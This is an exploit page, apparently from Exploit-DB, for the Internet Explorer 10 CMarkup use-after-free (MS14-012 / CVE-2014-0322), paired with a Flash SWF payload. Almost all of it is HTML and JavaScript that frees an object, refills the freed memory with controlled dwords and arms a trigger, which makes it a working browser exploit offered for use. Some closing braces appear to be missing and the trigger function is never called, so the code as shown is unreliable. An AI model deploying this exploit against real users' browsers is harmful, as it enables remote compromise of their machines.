Internet Explorer 10 & Adobe Flash Player (12.0.0.70, 12.0.0.77)

<!--

MS14-012 Internet Explorer CMarkup Use-After-Free

Vendor Homepage: http://www.microsoft.com

Version: IE 10

Date: 2014-03-31

Exploit Author: Jean-Jamil Khalife

Tested on: Windows 7 SP1 x64 (fr, en)

Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)

Home: http://www.hdwsec.fr

Blog : http://www.hdwsec.fr/blog/

MS14-012 / CVE-2014-0322

Generation:

c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf

E-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as

-->

<html>

<head>

</head>

<body>

<script>

var g_arr = [];

var arrLen = 0x250;

function dword2data(dword)

{

var d = Number(dword).toString(16);

while (d.length < 8)

d = '0' + d;

return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));

}

function eXpl()

{

var a=0;

for (a=0; a < arrLen; a++) {

g_arr[a] = document.createElement('div');

}

// Build a new object

var b = dword2data(0x19fffff3);

while (b.length < 0x360)

{

// mov eax,dword ptr [esi+98h]

// ...

// mov eax,dword ptr [eax+8]

// and dword ptr [eax+2F0h],0FFFFFFBFh

if (b.length == (0x98 / 2))

{

b += dword2data(0x1a000010);

}

// mov ecx,dword ptr [edx+94h]

// mov eax,dword ptr [ecx+0Ch]

else if (b.length == (0x94 / 2))

{

b += dword2data(0x1a111111);

}

// mov eax,dword ptr [edx+15Ch]

// mov ecx,dword ptr [eax+edx*8]

else if (b.length == (0x15c / 2))

{

b += dword2data(0x42424242);

}

else

{

b += dword2data(0x19fffff3);

}

var d = b.substring(0, ( 0x340 - 2 )/2);

// trigger

try{

this.outerHTML=this.outerHTML

}

catch(e){

}

CollectGarbage();

// Replace freed object

for (a=0; a < arrLen; a++)

{

g_arr[a].title = d.substring(0, d.length);

}

// Trigger the vulnerability

function trigger()

{

var a = document.getElementsByTagName("script");

var b = a[0];

b.onpropertychange = eXpl;

var c = document.createElement('SELECT');

c = b.appendChild(c);

}

</script>

<embed src=AsXploit.swf width="10" height="10"></embed>

</body>

</html>